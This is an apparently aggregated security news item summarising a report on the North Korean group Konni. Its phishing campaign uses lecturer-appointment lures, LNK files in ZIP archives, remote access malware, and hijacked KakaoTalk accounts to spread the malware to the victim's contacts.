"Initial access was achieved through a spear-phishing email disguised as a notice appointing the recipient as a North Korean human rights lecturer. After the spear-phishing attack succeeded, the victim executed a malicious LNK file, resulting in infection with remote access malware. The malware remained concealed and persistent on the victim's endpoint for an extended period, stealing internal documents and sensitive information."
"The threat actor is said to have remained on the compromised host for an extended period of time, leveraging the unauthorized access to siphon internal documents and make use of the KakaoTalk application to selectively propagate the malware to specific contacts. The attack is notable for abusing the trust associated with compromised victims to deceive and ensnare additional targets."
"The starting point of the latest attack campaign is a spear-phishing email that's used as a ploy to trick recipients into opening a ZIP file attachment containing a Windows shortcut (LNK). Upon execution, the LNK file downloads a next-stage payload from an external server, establishes persistence using scheduled tasks, and ultimately executes the malware."
North Korean hacking group Konni has conducted phishing campaigns targeting victims with emails impersonating North Korean human rights lecturer appointments. After victims execute malicious LNK files from ZIP attachments, remote access malware infects their systems and remains hidden for extended periods. The attackers steal internal documents and sensitive information, then exploit the compromised KakaoTalk desktop application to distribute malware to the victim's contacts. This attack method leverages victim trust to deceive additional targets. Konni has previously abused KakaoTalk sessions to send malicious ZIP archives and remotely wipe Android devices using stolen credentials.
#north-korean-threat-actors #konni-hacking-group #spear-phishing-campaigns #kakaotalk-malware-distribution #remote-access-malware
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]